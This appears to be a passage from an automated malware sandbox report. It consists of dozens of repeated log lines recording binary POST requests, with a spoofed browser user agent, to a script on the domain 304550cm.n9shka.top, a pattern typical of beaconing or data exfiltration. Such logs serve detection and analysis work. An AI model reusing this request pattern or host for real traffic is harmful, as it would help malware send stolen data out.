                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1388Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1372Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
